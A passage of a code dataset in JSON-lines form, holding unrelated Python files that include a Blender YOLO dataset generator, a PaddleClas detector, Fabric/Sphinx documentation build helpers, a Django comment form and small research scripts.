range(len(objs)):\n # Get the bouding box of the objects in YOLO formtat\n x, y, w, h = bounding_box(objs[i], True)\n f.write(f'{names[colls[i]]} {x} {y} {w} {h}')\n if i != ln - 1 :\n f.write('\\n') \n # Render the image\n bpy.ops.render.render(write_still = True)\n\n\ndef main(n):\n for i in collections:\n for _ in range(n):\n start_time = time.time()\n use_collection(i)\n total_time = time.time() - start_time\n with open('algtimes.txt', 'a') as f:\n f.write(f'{total_time}\\n')\n progress(i.name)\n\nif __name__ == '__main__':\n startTime = time.time()\n hdris = [os.path.join(hdris_dir, i) for i in os.listdir(hdris_dir)]\n collections = bpy.data.collections['Objects'].children\n names = init(collections, save_dir)\n main(images_per_class)\n totalTime = time.time() - startTime \n print('Total time:', totalTime)","repo_name":"rogerramosruiz/synthetic-dataset-blender-hdri","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"43022354245","text":"\n# coding: utf-8\n\n# 1. use reg expressions to just get the nums - capture groups. specificying character ranges. char class for white space. sometimes no num just a period\n# 2. find a way to parse thru nums. find new and old vals.\n# 3. find way deal w multi old vals\n# 4. print things that dont match to inspect\n\n# In[19]:\n\ninfile = [\n'replace rocc60 = 41 if rocc70 == 103',\n'hello ',\n'replace rocc60 = 42 if rocc70 == 112',\n'',\n'replace rocc60 = 43 if rocc70 == 113',\n'',\n'replace rocc60 = 45 if rocc70 == 110',\n'',\n'replace rocc60 = 50 if rocc70 == 114',\n'',\n'replace rocc60 = 52 if rocc70 == 134',\n'',\n'replace rocc60 = 53 if rocc70 == 120 | rocc70 == 121 | rocc70 == 122 | rocc70 == 125 | rocc70 == 126 ',\n'',\n'replace rocc60 = 54 if rocc70 == 115 | rocc70 == 130 | rocc70 == 131 | rocc70 == 132 | rocc70 == 133',\n'',\n'replace rocc60 = 60 if rocc70 == 135 | rocc70 == 140',\n'',\n'replace rocc60 = 70 if rocc70 == 182',\n\n]\n\n\n# In[51]:\n\nimport re\nimport pandas as pd\n\npat = re.compile(r\"\\s([0-9.]+)\")\n\nmappings = [] #list of tuples of whole content in file\n#mappings.append((new_val,(old_vals), (firstnum, secondnums), (fistnum, secondnums))\n\n#with open(\"name.txt\") as infile:\nfor line in infile:\n \n if line.startswith(\"replace rocc\"):\n list_of_all_nums = pat.findall(line) # gets all numbers\n new_val = list_of_all_nums[0] # new number\n #old_vals = [] # list of all or the one old values \n \n for num in list_of_all_nums[1:]:\n key_val_pair = (num, new_val) ## \n mappings.append(key_val_pair)\n \n else:\n if line:\n print(line)\n \n# make a pandas data frame\ndf = pd.DataFrame(data = mappings, columns=['old val', 'new val' ])\ndf\n\n\n# In[ ]:\n#%%\nprint('hello')\n\n#%%\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"kaitlynson/SDL-lab-research","sub_path":"research/df for new old numsvals rocc60.py","file_name":"df for new old numsvals rocc60.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23445136805","text":"import os\nimport argparse\nimport time\nfrom functools import reduce\n\nimport yaml\nimport ast\nimport numpy as np\nimport cv2\nimport paddle\n\nfrom paddleclas.deploy.utils import logger, config\nfrom paddleclas.deploy.utils.predictor import Predictor\nfrom paddleclas.deploy.utils.get_image_list import get_image_list\nfrom paddleclas.deploy.python.preprocess import 
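# Aside: the save() routine above writes one "class x y w h" line per object in
# the YOLO convention, i.e. centre coordinates and sizes normalised by the
# render resolution. A minimal sketch of that conversion from a pixel-space
# box; to_yolo and its arguments are illustrative names, not part of the repo.
def to_yolo(x_min, y_min, x_max, y_max, img_w, img_h):
    x = (x_min + x_max) / 2.0 / img_w   # normalised centre x
    y = (y_min + y_max) / 2.0 / img_h   # normalised centre y
    w = (x_max - x_min) / img_w         # normalised width
    h = (y_max - y_min) / img_h         # normalised height
    return x, y, w, h

# to_yolo(50, 40, 150, 240, 640, 480) -> (0.15625, 0.2917, 0.15625, 0.4167)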
create_operators\nfrom paddleclas.deploy.python.det_preprocess import det_preprocess\n\n\nclass DetPredictor(Predictor):\n def __init__(self, config):\n super().__init__(config[\"Global\"],\n config[\"Global\"][\"det_inference_model_dir\"])\n\n self.preprocess_ops = create_operators(config[\"DetPreProcess\"][\n \"transform_ops\"])\n self.config = config\n\n def preprocess(self, img):\n im_info = {\n 'scale_factor': np.array(\n [1., 1.], dtype=np.float32),\n 'im_shape': np.array(\n img.shape[:2], dtype=np.float32),\n 'input_shape': self.config[\"Global\"][\"image_shape\"],\n \"scale_factor\": np.array(\n [1., 1.], dtype=np.float32)\n }\n im, im_info = det_preprocess(img, im_info, self.preprocess_ops)\n inputs = self.create_inputs(im, im_info)\n return inputs\n\n def create_inputs(self, im, im_info):\n \"\"\"generate input for different model type\n Args:\n im (np.ndarray): image (np.ndarray)\n im_info (dict): info of image\n model_arch (str): model type\n Returns:\n inputs (dict): input of model\n \"\"\"\n inputs = {}\n inputs['image'] = np.array((im, )).astype('float32')\n inputs['im_shape'] = np.array(\n (im_info['im_shape'], )).astype('float32')\n inputs['scale_factor'] = np.array(\n (im_info['scale_factor'], )).astype('float32')\n\n return inputs\n\n def parse_det_results(self, pred, threshold, label_list):\n max_det_results = self.config[\"Global\"][\"max_det_results\"]\n keep_indexes = pred[:, 1].argsort()[::-1][:max_det_results]\n results = []\n for idx in keep_indexes:\n single_res = pred[idx]\n class_id = int(single_res[0])\n score = single_res[1]\n bbox = single_res[2:]\n if score < threshold:\n continue\n label_name = label_list[class_id]\n results.append({\n \"class_id\": class_id,\n \"score\": score,\n \"bbox\": bbox,\n \"label_name\": label_name,\n })\n return results\n\n def predict(self, image, threshold=0.5, run_benchmark=False):\n '''\n Args:\n image (str/np.ndarray): path of image/ np.ndarray read by cv2\n threshold (float): threshold of predicted box' score\n Returns:\n results (dict): include 'boxes': np.ndarray: shape:[N,6], N: number of box,\n matix element:[class, score, x_min, y_min, x_max, y_max]\n MaskRCNN's results include 'masks': np.ndarray:\n shape: [N, im_h, im_w]\n '''\n inputs = self.preprocess(image)\n np_boxes = None\n input_names = self.predictor.get_input_names()\n\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n\n t1 = time.time()\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n boxes_tensor = self.predictor.get_output_handle(output_names[0])\n np_boxes = boxes_tensor.copy_to_cpu()\n t2 = time.time()\n\n print(\"Inference: {} ms per batch image\".format((t2 - t1) * 1000.0))\n\n # do not perform postprocess in benchmark mode\n results = []\n if reduce(lambda x, y: x * y, np_boxes.shape) < 6:\n print('[WARNNING] No object detected.')\n else:\n results = self.parse_det_results(\n np_boxes, self.config[\"Global\"][\"threshold\"],\n self.config[\"Global\"][\"label_list\"])\n return results\n\n\ndef main(config):\n det_predictor = DetPredictor(config)\n image_list = get_image_list(config[\"Global\"][\"infer_imgs\"])\n\n assert config[\"Global\"][\"batch_size\"] == 1\n for idx, image_file in enumerate(image_list):\n img = cv2.imread(image_file)[:, :, ::-1]\n output = det_predictor.predict(img)\n print(output)\n\n return\n\n\nif __name__ == \"__main__\":\n args = config.parse_args()\n config = config.get_config(args.config, 
overrides=args.override, show=True)\n main(config)\n","repo_name":"PaddlePaddle/PaddleClas","sub_path":"deploy/python/predict_det.py","file_name":"predict_det.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":5081,"dataset":"github-code","pt":"3"} +{"seq_id":"25065095076","text":"# 1228\nfrom collections import Counter\n\n\nclass Solution:\n def missingNumber(self, arr):\n # base case - all elements of the array are the same, diff is 0\n if len(set(arr)) == 1:\n return arr[0] \n\n # array length is 3:\n if len(arr) == 3:\n #find if this is increasing or dec:\n incr = True if arr[1] > arr[0] else False\n a, b = arr[1] - arr[0], arr[2] - arr[1]\n if incr:\n return min(arr[:2]) + min([a, b])\n else:\n return max(arr[:2]) + max([a, b])\n\n\n\n D = dict()\n A = [None] * (len(arr) -1)\n for i in range(len(arr)-1):\n diff = arr[i+1] - arr[i]\n A[i] = diff\n if diff in D:\n D[diff] += 1\n else:\n D[diff] = 1\n\n for a, b in D.items():\n if b == 1:\n j = A.index(a)\n elif b > 1:\n other_a = a\n\n # new_arr = arr[:j+1] + [arr[j] + other_a] + arr[j+1:]\n new_arr = arr[j] + other_a\n return new_arr\n\n\nL = [5, 7, 11, 13]\nS = Solution()\nx = S.missingNumber(L)\nprint(x)\n","repo_name":"jkfer/LeetCode","sub_path":"Missing_num_in_arithm_progress.py","file_name":"Missing_num_in_arithm_progress.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14694954168","text":"import importlib\nimport os\nimport datetime\nimport glob\n\nimport sphinx\nfrom babel.dates import format_date\nfrom unipath import Path\n\nfrom atelier.utils import i2d\nfrom atelier import rstgen\n\ntry:\n from fabric.api import env, local, task\n from fabric.utils import abort, puts\n from fabric.contrib.console import confirm\n from fabric.api import lcd\nexcept ImportError:\n def task(**kwargs):\n def d(f):\n return f\n return d\n # ignore it here so that Sphinx autodoc can import it even\n # if fabric is not installed.\n\n\ndef get_current_date(today=None):\n \"\"\"\n \"\"\"\n\n if today is None:\n return datetime.date.today()\n return i2d(today)\n\n\nclass RstFile(object):\n\n def __init__(self, local_root, url_root, parts):\n self.path = local_root.child(*parts) + '.rst'\n self.url = url_root + \"/\" + \"/\".join(parts) + '.html'\n # if parts[0] == 'docs':\n # self.url = url_root + \"/\" + \"/\".join(parts[1:]) + '.html'\n # else:\n # raise Exception(\"20131125\")\n # self.url = url_root + \"/\" + \"/\".join(parts) + '.html'\n\n\ndef add_demo_project(p):\n \"\"\"Register the specified settings module as being a Django demo project.\n See also :attr:`env.demo_projects`.\n\n \"\"\"\n if p in env.demo_projects:\n return\n # raise Exception(\"Duplicate entry %r in demo_projects.\" % db)\n env.demo_projects.append(p)\n\n\ndef setup_from_fabfile(\n globals_dict, main_package=None, settings_module_name=None):\n \"\"\"To be called from within your project's :xfile:`fabfile.py`.\n\n Minimal example::\n\n from atelier.fablib import *\n setup_from_fabfile(globals())\n\n If this doctree is the main doctree of a Python project, then the\n minimal example should be::\n\n from atelier.fablib import *\n setup_from_fabfile(globals(), \"foobar\")\n\n Where \"foobar\" is the Python name of your project's main package.\n\n \"\"\"\n if not '__file__' in globals_dict:\n raise Exception(\n \"No '__file__' in %r. 
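# Aside: parse_det_results in the PaddleClas record above keeps the top
# detections with `pred[:, 1].argsort()[::-1][:max_det_results]` - sort on the
# score column, reverse to descending order, truncate to k. The same idiom on
# invented data:
import numpy as np

pred = np.array([
    [0, 0.30, 10, 10, 50, 50],   # [class_id, score, x_min, y_min, x_max, y_max]
    [1, 0.90, 20, 20, 60, 60],
    [0, 0.55, 30, 30, 70, 70],
])
keep = pred[:, 1].argsort()[::-1][:2]
print(keep)             # [1 2]  - indexes of the two highest scores
print(pred[keep, 1])    # [0.9  0.55]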
\"\n \"First parameter to must be `globals()`\" % globals_dict)\n \n fabfile = Path(globals_dict['__file__'])\n if not fabfile.exists():\n raise Exception(\"No such file: %s\" % fabfile)\n env.root_dir = fabfile.parent.absolute()\n # print(\"20141027 %s %s \" % (main_package, env.root_dir))\n\n env.project_name = env.root_dir.name\n env.setdefault('build_dir_name', '.build') # but ablog needs '_build'\n \n env.setdefault('long_date_format', \"%Y%m%d (%A, %d %B %Y)\")\n # env.work_root = Path(env.work_root)\n env.setdefault('use_dirhtml', False)\n env.setdefault('blog_root', env.root_dir.child('docs'))\n\n env.setdefault('sdist_dir', None)\n env.setdefault('editor_command', None)\n if env.sdist_dir is not None:\n env.sdist_dir = Path(env.sdist_dir)\n env.main_package = main_package\n env.locale_dir = None\n env.tolerate_sphinx_warnings = False\n env.demo_projects = []\n env.revision_control_system = None\n env.apidoc_exclude_pathnames = []\n # env.blogger_url = \"http://blog.example.com/\"\n\n env.setdefault('languages', None)\n env.setdefault('blogger_project', None)\n env.setdefault('blogger_url', None)\n env.setdefault('cleanable_files', [])\n\n if isinstance(env.languages, basestring):\n env.languages = env.languages.split()\n\n # if env.main_package:\n # env.SETUP_INFO = get_setup_info(Path(env.root_dir))\n # else:\n # env.SETUP_INFO = None\n\n if settings_module_name is not None:\n os.environ['DJANGO_SETTINGS_MODULE'] = settings_module_name\n from django.conf import settings\n # why was this? settings.SITE.startup()\n env.languages = [lng.name for lng in settings.SITE.languages]\n # env.demo_databases.append(settings_module_name)\n #~ env.userdocs_base_language = settings.SITE.languages[0].name\n\n # The following import will populate the projects\n from atelier.projects import get_project_info\n env.current_project = get_project_info(env.root_dir)\n\n env.doc_trees = env.current_project.doc_trees\n\n # env.SETUP_INFO = env.current_project.SETUP_INFO\n\n\nsetup_from_project = setup_from_fabfile # backwards compat\n\n\n#~ def confirm(msg,default='y',others='n',**override_callbacks):\n #~ text = \"%s [%s%s]\" % (msg,default.upper(),others)\n #~ def y(): return True\n # ~ # def n(): abort(\"Missing user confirmation for:\\n%s\" % msg)\n #~ def n(): abort(\"Missing user confirmation\")\n #~ callbacks = dict(y=y,n=n)\n #~ callbacks.update(override_callbacks)\n #~ while True:\n #~ answer = prompt(text)\n # ~ # answer = raw_input(prompt)\n #~ if not answer:\n #~ answer = default\n #~ answer = answer.lower()\n #~ if answer:\n #~ return callbacks.get(answer)()\ndef must_confirm(*args, **kw):\n if not confirm(*args, **kw):\n abort(\"Dann eben nicht...\")\n\n\ndef must_exist(p):\n if not p.exists():\n abort(\"No such file: %s\" % p.absolute())\n\n\ndef rmtree_after_confirm(p):\n if not p.exists():\n return\n if confirm(\"OK to remove %s and everything under it?\" % p.absolute()):\n p.rmtree()\n\n\ndef unused_get_locale_dir():\n # replaced by env.locale_dir\n if not env.main_package:\n return None # abort(\"No main_package\")\n args = env.main_package.split('.')\n args.append('locale')\n p = env.root_dir.child(*args)\n if not p.isdir():\n return None # abort(\"Directory %s does not exist.\" % p)\n return p\n\n\ndef cleanup_pyc(p):\n \"\"\"Thanks to oddthinking on http://stackoverflow.com/questions/2528283\n \"\"\"\n for root, dirs, files in os.walk(p):\n pyc_files = [filename for filename in files if filename.endswith(\".pyc\")]\n py_files = set([filename for filename in files if 
filename.endswith(\".py\")])\n excess_pyc_files = [pyc_filename for pyc_filename in pyc_files if pyc_filename[:-1] not in py_files]\n for excess_pyc_file in excess_pyc_files:\n full_path = os.path.join(root, excess_pyc_file)\n must_confirm(\"Remove excess file %s:\" % full_path)\n os.remove(full_path)\n\n\n@task(alias='unused_mm')\ndef make_messages():\n \"Extract messages, then initialize and update all catalogs.\"\n extract_messages()\n init_catalog_code()\n update_catalog_code()\n\n if False:\n extract_messages_userdocs()\n setup_babel_userdocs('init_catalog')\n setup_babel_userdocs('update_catalog')\n\n\ndef extract_messages():\n \"\"\"Extract messages from source files to `django.pot` file\"\"\"\n # locale_dir = get_locale_dir()\n locale_dir = env.locale_dir\n if locale_dir is None:\n return\n args = [\"python\", \"setup.py\"]\n args += [\"extract_messages\"]\n args += [\"-o\", Path(locale_dir).child(\"django.pot\")]\n cmd = ' '.join(args)\n #~ must_confirm(cmd)\n local(cmd)\n\n\ndef extract_messages_userdocs():\n \"\"\"\n Run the Sphinx gettext builder on userdocs.\n \"\"\"\n userdocs = env.root_dir.child('userdocs')\n if not userdocs.isdir():\n return # abort(\"Directory %s does not exist.\" % userdocs)\n args = ['sphinx-build', '-b', 'gettext']\n #~ args += cmdline_args\n # ~ args += ['-a'] # all files, not only outdated\n # ~ args += ['-P'] # no postmortem\n # ~ args += ['-Q'] # no output\n #~ if not env.tolerate_sphinx_warnings:\n # ~ args += ['-W'] # consider warnings as errors\n #~ args += ['-w',env.DOCSDIR.child('warnings.txt')]\n args += [userdocs]\n args += [userdocs.child(\"translations\")]\n cmd = ' '.join(args)\n local(cmd)\n\n\n@task(alias='rename')\ndef rename_data_url_friendly():\n data_dir = env.root_dir.child('docs', 'data')\n #~ print list(data_dir.listdir(names_only=True))\n print(list(data_dir.walk()))\n\n\ndef setup_babel_userdocs(babelcmd):\n \"\"\"Create userdocs .po files if necessary.\"\"\"\n userdocs = env.root_dir.child('userdocs')\n if not userdocs.isdir():\n return\n locale_dir = userdocs.child('translations')\n for domain in locale_dir.listdir('*.pot', names_only=True):\n domain = domain[:-4]\n for loc in env.languages:\n if loc != env.languages[0]:\n po_file = Path(locale_dir, loc, 'LC_MESSAGES', '%s.po' %\n domain)\n mo_file = Path(locale_dir, loc, 'LC_MESSAGES', '%s.mo' %\n domain)\n pot_file = Path(locale_dir, '%s.pot' % domain)\n if babelcmd == 'init_catalog' and po_file.exists():\n print(\"Skip %s because file exists.\" % po_file)\n #~ elif babelcmd == 'compile_catalog' and not mo_file.needs_update(po_file):\n #~ print \"Skip %s because newer than .po\" % mo_file\n else:\n args = [\"python\", \"setup.py\"]\n args += [babelcmd]\n args += [\"-l\", loc]\n args += [\"--domain\", domain]\n args += [\"-d\", locale_dir]\n #~ args += [ \"-o\" , po_file ]\n #~ if babelcmd == 'init_catalog':\n if babelcmd == 'compile_catalog':\n args += [\"-i\", po_file]\n else:\n args += [\"-i\", pot_file]\n cmd = ' '.join(args)\n #~ must_confirm(cmd)\n local(cmd)\n\n\n@task(alias='cmu')\ndef compile_catalog_userdocs():\n setup_babel_userdocs('compile_catalog')\n\n\ndef init_catalog_code():\n \"\"\"Create code .po files if necessary.\"\"\"\n from lino.core.site import to_locale\n locale_dir = env.locale_dir\n # locale_dir = get_locale_dir()\n if locale_dir is None:\n return\n locale_dir = Path(locale_dir)\n for loc in env.languages:\n if loc != 'en':\n f = locale_dir.child(loc, 'LC_MESSAGES', 'django.po')\n if f.exists():\n print(\"Skip %s because file exists.\" % f)\n 
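# Aside: cleanup_pyc above relies on the fact that "foo.pyc"[:-1] == "foo.py",
# so a .pyc is orphaned exactly when the trimmed name is missing from the same
# directory. A report-only variant of the same walk; find_orphaned_pyc is an
# illustrative name, not part of the library.
import os

def find_orphaned_pyc(root_dir):
    orphans = []
    for root, dirs, files in os.walk(root_dir):
        py_files = {f for f in files if f.endswith(".py")}
        for f in files:
            if f.endswith(".pyc") and f[:-1] not in py_files:
                orphans.append(os.path.join(root, f))   # .py source is gone
    return orphans

# print("\n".join(find_orphaned_pyc(".")))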
else:\n args = [\"python\", \"setup.py\"]\n args += [\"init_catalog\"]\n args += [\"--domain django\"]\n args += [\"-l\", to_locale(loc)]\n args += [\"-d\", locale_dir]\n #~ args += [ \"-o\" , f ]\n args += [\"-i\", locale_dir.child('django.pot')]\n cmd = ' '.join(args)\n must_confirm(cmd)\n local(cmd)\n\n\ndef update_catalog_code():\n \"\"\"Update .po files from .pot file.\"\"\"\n from lino.core.site import to_locale\n locale_dir = env.locale_dir\n # locale_dir = get_locale_dir()\n if locale_dir is None:\n return\n locale_dir = Path(locale_dir)\n for loc in env.languages:\n if loc != env.languages[0]:\n args = [\"python\", \"setup.py\"]\n args += [\"update_catalog\"]\n args += [\"--domain django\"]\n #~ args += [ \"-d\" , locale_dir ]\n args += [\"-o\", locale_dir.child(loc, 'LC_MESSAGES', 'django.po')]\n args += [\"-i\", locale_dir.child(\"django.pot\")]\n args += [\"-l\", to_locale(loc)]\n cmd = ' '.join(args)\n #~ must_confirm(cmd)\n local(cmd)\n\n\n@task(alias='cm')\ndef compile_catalog():\n \"\"\"Compile .po files to .mo files.\"\"\"\n from lino.core.site import to_locale \n locale_dir = env.locale_dir\n # locale_dir = get_locale_dir()\n if locale_dir is None:\n return\n for loc in env.languages:\n if loc != env.languages[0]:\n args = [\"python\", \"setup.py\"]\n args += [\"compile_catalog\"]\n args += [\"-i\", locale_dir.child(loc, 'LC_MESSAGES', 'django.po')]\n args += [\"-o\", locale_dir.child(loc, 'LC_MESSAGES', 'django.mo')]\n args += [\"--domain django\"]\n #~ args += [ \"-d\" , locale_dir ]\n args += [\"-l\", to_locale(loc)]\n cmd = ' '.join(args)\n #~ must_confirm(cmd)\n local(cmd)\n\n\n@task(alias='mss')\ndef makescreenshots():\n \"\"\"generate screenshot .jpg files to gen/screenshots.\"\"\"\n run_in_demo_projects('makescreenshots', '--traceback')\n\n\n@task(alias='sss')\ndef syncscreenshots():\n \"\"\"synchronize gen/screenshots to userdocs/gen/screenshots.\"\"\"\n run_in_demo_projects('syncscreenshots', '--traceback',\n 'gen/screenshots', 'userdocs/gen/screenshots')\n\n\ndef sphinx_build(builder, docs_dir,\n cmdline_args=[], language=None, build_dir_cmd=None):\n args = ['sphinx-build', '-b', builder]\n args += cmdline_args\n # ~ args += ['-a'] # all files, not only outdated\n # ~ args += ['-P'] # no postmortem\n # ~ args += ['-Q'] # no output\n # build_dir = docs_dir.child(env.build_dir_name)\n build_dir = Path(env.build_dir_name)\n if language is not None:\n args += ['-D', 'language=' + language]\n # needed in select_lang.html template\n args += ['-A', 'language=' + language]\n if language != env.languages[0]:\n build_dir = build_dir.child(language)\n #~ print 20130726, build_dir\n if env.tolerate_sphinx_warnings:\n args += ['-w', 'warnings_%s.txt' % builder]\n else:\n args += ['-W'] # consider warnings as errors\n # args += ['-vvv'] # increase verbosity\n #~ args += ['-w'+Path(env.root_dir,'sphinx_doctest_warnings.txt')]\n args += ['.', build_dir]\n cmd = ' '.join(args)\n with lcd(docs_dir):\n local(cmd)\n if build_dir_cmd is not None:\n with lcd(build_dir):\n local(build_dir_cmd)\n\n\ndef sync_docs_data(docs_dir):\n build_dir = docs_dir.child(env.build_dir_name)\n for data in ('dl', 'data'):\n src = docs_dir.child(data).absolute()\n if src.isdir():\n target = build_dir.child('dl')\n target.mkdir()\n cmd = 'cp -ur %s %s' % (src, target.parent)\n local(cmd)\n if False:\n # according to http://mathiasbynens.be/notes/rel-shortcut-icon\n for n in ['favicon.ico']:\n src = docs_dir.child(n).absolute()\n if src.exists():\n target = build_dir.child(n)\n cmd = 'cp %s %s' % (src, 
target.parent)\n local(cmd)\n\n\n@task(alias='userdocs')\ndef build_userdocs(*cmdline_args):\n \"\"\"\n Deprecated. sphinx-build the userdocs tree in all languages\n \"\"\"\n if env.languages is None:\n return\n docs_dir = env.root_dir.child('userdocs')\n if not docs_dir.exists():\n return\n for lng in env.languages:\n sphinx_build('html', docs_dir, cmdline_args, lng)\n sync_docs_data(docs_dir)\n\n\n@task(alias='pdf')\ndef build_userdocs_pdf(*cmdline_args):\n if env.languages is None:\n return\n docs_dir = env.root_dir.child('userdocs')\n if not docs_dir.exists():\n return\n for lng in env.languages:\n sphinx_build('latex', docs_dir, cmdline_args,\n lng, build_dir_cmd='make all-pdf')\n sync_docs_data(docs_dir)\n\n\n@task(alias='linkcheck')\ndef sphinx_build_linkcheck(*cmdline_args):\n \"\"\"sphinxbuild -b linkcheck docs.\"\"\"\n docs_dir = env.root_dir.child('docs')\n if docs_dir.exists():\n sphinx_build('linkcheck', docs_dir, cmdline_args)\n docs_dir = env.root_dir.child('userdocs')\n if docs_dir.exists():\n lng = env.languages[0]\n #~ lng = env.userdocs_base_language\n sphinx_build('linkcheck', docs_dir, cmdline_args, lng)\n\n\ndef get_doc_trees():\n for rel_doc_tree in env.doc_trees:\n docs_dir = env.root_dir.child(rel_doc_tree)\n if not docs_dir.exists():\n msg = \"Directory %s does not exist.\" % docs_dir\n msg += \"\\nCheck your project's `doc_trees` setting.\"\n raise Exception(msg)\n yield docs_dir\n\n\ndef run_in_demo_projects(admin_cmd, *more):\n \"\"\"Run the given shell command in each demo project (see\n :attr:`env.demo_projects`).\n\n \"\"\"\n for mod in env.demo_projects:\n puts(\"-\" * 80)\n puts(\"In demo project {0}:\".format(mod))\n\n from importlib import import_module\n m = import_module(mod)\n # p = Path(m.__file__).parent.absolute()\n p = m.SITE.cache_dir or m.SITE.project_dir\n\n with lcd(p):\n args = [\"django-admin.py\"]\n args += [admin_cmd]\n args += more\n #~ args += [\"--noinput\"]\n args += [\"--settings=\" + mod]\n #~ args += [\" --pythonpath=%s\" % p.absolute()]\n cmd = \" \".join(args)\n local(cmd)\n\n\n\n\n\n@task(alias='ddt')\ndef double_dump_test():\n \"\"\"\n Perform a \"double dump test\" on every demo database.\n TODO: convert this to a Lino management command.\n \"\"\"\n raise Exception(\"Not yet converted after 20150129\")\n if len(env.demo_databases) == 0:\n return\n a = Path(env.temp_dir, 'a')\n b = Path(env.temp_dir, 'b')\n rmtree_after_confirm(a)\n rmtree_after_confirm(b)\n #~ if not confirm(\"This will possibly break the demo databases. 
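# Aside: sphinx_build above composes its command line as a list of strings
# before joining and shelling out. Passing the list straight to subprocess
# avoids the join and any quoting issues; a minimal sketch under that
# assumption (run_sphinx and its defaults are invented for illustration):
import subprocess

def run_sphinx(builder, source_dir, build_dir, language=None, strict=True):
    args = ["sphinx-build", "-b", builder]
    if language is not None:
        args += ["-D", "language=" + language]
    if strict:
        args += ["-W"]                    # treat warnings as errors
    args += [source_dir, build_dir]
    return subprocess.call(args)          # list form: no shell quoting needed

# run_sphinx("html", "docs", "docs/.build", language="en")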
Are you sure?\"):\n #~ return\n #~ a.mkdir()\n with lcd(env.temp_dir):\n for db in env.demo_databases:\n if a.exists():\n a.rmtree()\n if b.exists():\n b.rmtree()\n local(\"django-admin.py dump2py --settings=%s --traceback a\" % db)\n local(\n \"django-admin.py run --settings=%s --traceback a/restore.py\" %\n db)\n local(\"django-admin.py dump2py --settings=%s --traceback b\" % db)\n local(\"diff a b\")\n\n\n","repo_name":"miller2082/lino_polls","sub_path":"lib/python2.7/site-packages/atelier/fablib.py","file_name":"fablib.py","file_ext":"py","file_size_in_byte":17412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24429956654","text":" # Robby Sodhi\n # J.Bains\n # 2023\n # Constants file, useful methods/variables needed throughout the program\n\nimport datetime\n\nstock_data_database_path = \"stock_data.db\"\nuser_data_database_path = \"user_data.db\"\n\ndate_format = \"%Y-%m-%d\"\n\nstarting_balance = 50000\n\n\ndef getCurrentDate(format):\n # get the current time, turn it into a format string, then convert it back to a date time object (erases the time, we just want date)\n return datetime.datetime.strptime(datetime.datetime.now().strftime(format), format)\n\n\ndef find_first_occurence_in_2D_Array(arr, value):\n for i in arr:\n for x in i:\n if (x == value):\n return i\n return None\n","repo_name":"Robby-Sodhi/stock_market_manager_java","sub_path":"Server/serverGui + rest + ssdp + misc/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71568743760","text":"from django import forms\nfrom .models import Comment\nclass CommentForm(forms.ModelForm):\n author = forms.CharField(max_length=20, widget=forms.TextInput(attrs={\n \"class\": \"form-control\", \"id\": \"author\", \"placeholder\": \"Your Name\"\n }))\n body = forms.CharField(max_length=200, widget=forms.Textarea(attrs={\n \"class\":\"form-control\", \"id\": \"body\", \"placeholder\": \"Comment Here\"\n }))\n class Meta:\n model = Comment\n fields = ['author', 'body',]\n","repo_name":"ClintonCode20/Django-Blog-With-Ajax","sub_path":"blogapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"10350569280","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import random\n\ninit = []\nfinal = []\n\na = float(raw_input(\"Enter the grain parameter for hexagonal grains\\n\"))\n\nfor i in range(7):\n\tfor j in range(4):\n\t\tinit = init + [(a + a*(3**0.5)*i, a + 3*j*a)]\n\t\tinit = init + [(a - (3**0.5)*a/2 + a*(3**0.5)*i, a + a/2 + 3*j*a)]\n\t\tinit = init + [(a - (3**0.5)*a/2 + a*(3**0.5)*i, a + 3*a/2 + 3*j*a)]\n\t\tinit = init + [(a + a*(3**0.5)*i, a + 2*a + 3*j*a)]\n\t\t\n# print type(init[0])\n# print init[0]\n\nplot1 = plt.subplot(211)\nplt.axis('equal')\nplt.scatter(*zip(*init))\n\n\n\nfor i in init:\n\tfinal = final + [(i[0] + random()/2 ,i[1] + random()/2)]\n\n# print type(final[0])\n# print final[0]\n\nplot2 = plt.subplot(212)\nplt.axis('equal')\nplt.scatter(*zip(*final))\n\n\nplot1.set_title('Initial EBSD Mapping')\nplot2.set_title('Final EBSD Mapping')\n\nsum_xx = 0\nsum_yy = 0\n\nfor i in range(len(init)):\n\tsum_xx = sum_xx - ((init[i])[0] - (final[i])[0])\n\tsum_yy = sum_yy - ((init[i])[1] - (final[i])[1])\n\n\"\"\"\nSince the grain side lenght is assumed to be one unit xy 
